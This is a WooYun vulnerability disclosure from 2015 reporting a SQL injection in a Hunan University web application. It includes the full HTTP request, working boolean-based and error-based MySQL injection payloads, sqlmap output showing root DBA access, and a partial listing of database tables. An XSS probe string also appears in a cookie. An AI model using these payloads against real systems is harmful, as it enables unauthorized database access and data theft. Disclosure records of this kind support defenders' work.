当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0159019

漏洞标题:湖南大学某院sql注入(DBA权限)

相关厂商:hnu.cn;www.hnu.edu.cn

漏洞作者: 路人甲

提交时间:2015-12-07 14:05

修复时间:2016-01-21 18:22

公开时间:2016-01-21 18:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-07: 细节已通知厂商并且等待厂商处理中
2015-12-08: 厂商已经确认,细节仅向厂商公开
2015-12-18: 细节向核心白帽子及相关领域专家公开
2015-12-28: 细节向普通白帽子公开
2016-01-07: 细节向实习白帽子公开
2016-01-21: 细节向公众公开

简要描述:

详细说明:

http://acadol.hnu.edu.cn


POST /Hunan/ajax/question/getList.do HTTP/1.1
Content-Length: 201
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://acadol.hnu.edu.cn
Cookie: JSESSIONID=84C8AC98912A4DCD66DA4BBFBA892712; looyu_id=cbe248b02accdf85c0a4bb0ad3ee6529b2_10035260%3A1; looyu_10035260=v%3Acbe248b02accdf85c0a4bb0ad3ee6529b2%2Cref%3Ahttp%253A//www.acunetix-referrer.com/javascript%253AdomxssExecutionSink%25280%252C%2522%2527%255C%2522%253E%253Cxsstag%253E%2528%2529refdxss%2522%2529%2Cr%3A%2Cmon%3Ahttp%3A//m8100.talk99.cn/monitor%2Cp0%3Ahttp%253A//acadol.hnu.edu.cn/Hunan/university/news/list.do; _99_mon=%5B1%2C6%2C0%5D; __t99_10035260="_u:cbe248b02accdf85c0a4bb0ad3ee6529b2,_v:cbe248b02accdf85c0a4bb0ad3ee6529b2,_site:6759,_ct:1,_ref:http%3A%2F%2Fwww.acunetix-referrer.com%2Fjavascript%3AdomxssExecutionSink%280%2C%22%27%5C%22%3E%3Cxsstag%3E%28%29refdxss%22%29,_p0:http%3A%2F%2Facadol.hnu.edu.cn%2FHunan%2Funiversity%2Fnews%2Flist.do,_r:"
Host: acadol.hnu.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
by=desc&catalogId=0&courseId=0&curPage=1&key=&order=hot&pageSize=12


key参数存在注入

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: key (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: by=desc&catalogId=0&courseId=0&curPage=1&key=' AND 3937=3937 AND 'HGnX' LIKE 'HGnX&order=hot&pageSize=12
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: by=desc&catalogId=0&courseId=0&curPage=1&key=' AND (SELECT 9756 FROM(SELECT COUNT(*),CONCAT(0x716b706a71,(SELECT (ELT(9756=9756,1))),0x7178767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'RLdI' LIKE 'RLdI&order=hot&pageSize=12
---
web application technology: Nginx, JSP
back-end DBMS: MySQL 5.0
current user:    'root@%'
current database:    'hndx'
current user is DBA:    True
available databases [7]:
[*] hndx
[*] hndx_ceshi
[*] hunan
[*] information_schema
[*] mysql
[*] performance_schema
[*] test


ack-end DBMS: MySQL 5.0
[13:35:15] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables
[13:35:15] [INFO] fetching tables for database: 'hndx'
[13:35:15] [INFO] the SQL query used returns 454 entries
[13:35:15] [INFO] retrieved: company_detail
[13:35:16] [INFO] retrieved: edp_invitetendersrelationcompany
[13:35:16] [INFO] retrieved: edp_invitetendersrelationtutors
[13:35:17] [INFO] retrieved: el_discuss_relation_poll
[13:35:17] [INFO] retrieved: el_poll_option
[13:35:18] [INFO] retrieved: el_question_group
[13:35:18] [INFO] retrieved: el_room_relation_elgroup
[13:35:18] [INFO] retrieved: el_staff_relation_poll
[13:35:19] [INFO] retrieved: kx_admin_message
[13:35:19] [INFO] retrieved: kx_api_course_session
[13:35:19] [INFO] retrieved: kx_co_account_buy_records
[13:35:20] [INFO] retrieved: kx_co_bulletin
[13:35:20] [INFO] retrieved: kx_co_company
[13:35:20] [INFO] retrieved: kx_co_company_account
[13:35:21] [INFO] retrieved: kx_co_company_buy
[13:35:21] [INFO] retrieved: kx_co_company_license
[13:35:21] [INFO] retrieved: kx_co_company_relation_course
[13:35:22] [INFO] retrieved: kx_co_company_website
[13:35:22] [INFO] retrieved: kx_co_config
[13:35:22] [INFO] retrieved: kx_co_config_copy
[13:35:23] [INFO] retrieved: kx_co_course
[13:35:23] [INFO] retrieved: kx_co_course_auth_member
[13:35:24] [INFO] retrieved: kx_co_course_catalog
[13:35:24] [INFO] retrieved: kx_co_course_question
[13:35:24] [INFO] retrieved: kx_co_course_question_option
[13:35:25] [INFO] retrieved: kx_co_course_sco
[13:35:25] [INFO] retrieved: kx_co_course_testrule
[13:35:26] [INFO] retrieved: kx_co_courseware
[13:35:26] [INFO] retrieved: kx_co_dept
[13:35:27] [INFO] retrieved: kx_co_domain_reserve
[13:35:27] [INFO] retrieved: kx_co_knowledge_sharing
[13:35:28] [INFO] retrieved: kx_co_manager
[13:35:28] [INFO] retrieved: kx_co_message
[13:35:29] [INFO] retrieved: kx_co_module
[13:35:29] [INFO] retrieved: kx_co_mycertificate
[13:35:30] [INFO] retrieved: kx_co_point
[13:35:30] [INFO] retrieved: kx_co_read_massage
[13:35:31] [INFO] retrieved: kx_co_register
[13:35:31] [INFO] retrieved: kx_co_staff
[13:35:32] [INFO] retrieved: kx_co_staff_accont
[13:35:32] [INFO] retrieved: kx_co_staff_apply
[13:35:33] [INFO] retrieved: kx_co_staff_auth_course
[13:35:33] [INFO] retrieved: kx_co_staff_course_relation
[13:35:34] [INFO] retrieved: kx_co_staff_coursecatalog_relation
[13:35:34] [INFO] retrieved: kx_co_staff_credit_relation
[13:35:34] [INFO] retrieved: kx_co_staff_delivery
[13:35:35] [INFO] retrieved: kx_co_staff_learning_course
[13:35:35] [INFO] retrieved: kx_co_staff_online
[13:35:35] [INFO] retrieved: kx_co_staff_questionoption
[13:35:36] [INFO] retrieved: kx_co_staff_records
[13:35:36] [INFO] retrieved: kx_co_staff_workexperience
[13:35:37] [INFO] retrieved: kx_co_target
[13:35:37] [INFO] retrieved: kx_co_targetrelation
[13:35:37] [INFO] retrieved: kx_co_targetstaff
[13:35:38] [INFO] retrieved: kx_co_task_staff
[13:35:38] [INFO] retrieved: kx_co_training_offlinecourse
[13:35:39] [INFO] retrieved: kx_co_training_plan
[13:35:39] [INFO] retrieved: kx_co_training_plan_catalog_templates
[13:35:39] [INFO] retrieved: kx_co_training_plan_staff
[13:35:40] [INFO] retrieved: kx_co_training_plan_task
[13:35:40] [INFO] retrieved: kx_co_training_plan_task_staff
[13:35:41] [INFO] retrieved: kx_co_training_plan_task_staff_relevance
[13:35:41] [INFO] retrieved: kx_co_tutor
[13:35:41] [INFO] retrieved: kx_co_tutor_answer
[13:35:42] [INFO] retrieved: kx_co_tutor_answer_dtl
[13:35:42] [INFO] retrieved: kx_co_tutor_course
[13:35:43] [INFO] retrieved: kx_co_tutor_course_catalog
[13:35:43] [INFO] retrieved: kx_co_tutor_training_catalog
[13:35:43] [INFO] retrieved: kx_co_tutor_trainingclass
[13:35:44] [INFO] retrieved: kx_co_tutorthesisriew
[13:35:44] [INFO] retrieved: kx_discuss_reply
[13:35:44] [INFO] retrieved: kx_edp_authorization
[13:35:45] [INFO] retrieved: kx_edp_banner
[13:35:45] [INFO] retrieved: kx_edp_brochure
[13:35:45] [INFO] retrieved: kx_edp_brochure_relation_cour

漏洞证明:

修复方案:

mysql dba权限...

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-12-08 08:21

厂商回复:

谢谢,尽快修复

最新状态:

暂无